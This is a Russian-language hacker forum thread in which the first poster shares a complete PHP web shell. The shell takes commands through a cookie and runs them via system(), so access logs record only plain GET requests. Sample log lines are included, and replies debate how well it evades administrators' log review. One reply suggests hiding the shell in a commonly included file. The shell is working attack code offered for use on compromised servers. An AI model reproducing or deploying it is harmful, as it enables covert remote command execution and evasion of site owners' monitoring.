В один момент я задумался о том что во время использования какого-либо веб-шелла в логах сохраняються последовательные POST запросы к одному и тому же файлу, что может кидатся в глаза при анализе логов администраторами.

Я подумал почему бы не заменить передачу через POST на COOKIES. Реализацию подобного мне не приходилось наблюдать.

Вот и набросал небольшой веб-шелл, который в логах оставляет GET записи. Для работы должно быть разрешено использование cookies и Javascript.

cookie-shell.php
<?php
@set_time_limit(0);
$cmd = $_COOKIE['cmd'] ? $_COOKIE['cmd']: 'ls -la';
?>
<html>
<head><title>Cookies web-shell PoC</title></head>
<body>
<script type="text/javascript">
function send(val)
{
document.cookie = "cmd="+val;
location.reload();
}
</script>
<form>
<input type="text" id="cmd" value="<?=$cmd?>"/>
<input type="submit" onclick="send(document.getElementById('cmd').value)" value="execute"/>
</form>
<pre>
<?php
ob_start();
system($cmd);
$res = ob_get_contents();
ob_end_clean();
echo htmlspecialchars($res);
?>
</pre>
</body>
</html>

http://h3ck.rv.ua/upload/cookie-shell.png

После использования скрипта в логах останется примерно такое:
127.0.0.1 - - [24/Jun/2009:22:17:56 +0300] "GET /cookie-shell.php HTTP/1.1" 200 455 "http://localhost/cookie-shell.php" "Mozilla/5.0 (X11; U; Linux i686; uk; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11"
127.0.0.1 - - [24/Jun/2009:22:17:56 +0300] "GET /cookie-shell.php HTTP/1.1" 200 455 "-" "Mozilla/5.0 (X11; U; Linux i686; uk; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11"
127.0.0.1 - - [24/Jun/2009:22:17:58 +0300] "GET /cookie-shell.php HTTP/1.1" 200 289 "http://localhost/cookie-shell.php" "Mozilla/5.0 (X11; U; Linux i686; uk; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11"
127.0.0.1 - - [24/Jun/2009:22:17:58 +0300] "GET /cookie-shell.php HTTP/1.1" 200 289 "http://localhost/cookie-shell.php" "Mozilla/5.0 (X11; U; Linux i686; uk; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11"

Интересует Ваше мнение по практическому использованию даного метода.

а последовательные гет записи к неизвестному файлу подозрения не вызовут?

Sharky +1
тоже подумал

АррЪ! Забивать шелл в файл c functions или т.е =) и потом подгружать шелл уже с любой страницы которая инклудит этот файл :) вЭлосипед ё-маё =)

Расскажите в чем прикол

команды явой пишуться в кукисы,и к файлу никаких запросов с команлами не идет.выполнение команд из кукмсов

Даа, чо-то ты не туда завернул) Запросы то все равно идут...

Да,запросы идут,но никаких параметров через ГЕТ или ПОСт не передаеться,смотрите код.

ну дык Тот же Madshell какбе POSTами шлет(никаких параметров), да и другие тоже.

Топикстартер сам себе противоречит.

В один момент я задумался о том что во время использования какого-либо веб-шелла в логах сохраняються последовательные POST запросы к одному и тому же файлу, что может кидатся в глаза при анализе логов администраторами.

Его шелл точно также оставляет последовательные GET запросы к одному и тому же файлу.

Это просто попытка перепрыгнуть свою голову, имхо.

Оствляет,только вот там не видно никаких: cmd=ls -la , согласись?
А кагбудто просто делали запросы к файлегу,может это был гугль?)

вот там не видно никаких: cmd=ls -la
А при POST видно?

m0Hze понял тему. Ведь например при обычном использовании форума или CMS намного больше остаётся GET запросов чем POST...

Тогда уж лучше на сокетах минитроянчег или бекдор =)

Интересует Ваше мнение по практическому использованию даного метода.
Идея хорошая и правильная. Кстати, года 4-5 назад подобный веб-шелл (передающий команды через кукисы) уже релизил кто-то (никак не могу вспомнить кто это был), но тогда как-то никто не оценил этой идеи, а затем уже пошла мода переделывать все шеллы, чтоб юзали POST вместо GET'a, чтоб было "меньше палева" в логах. (: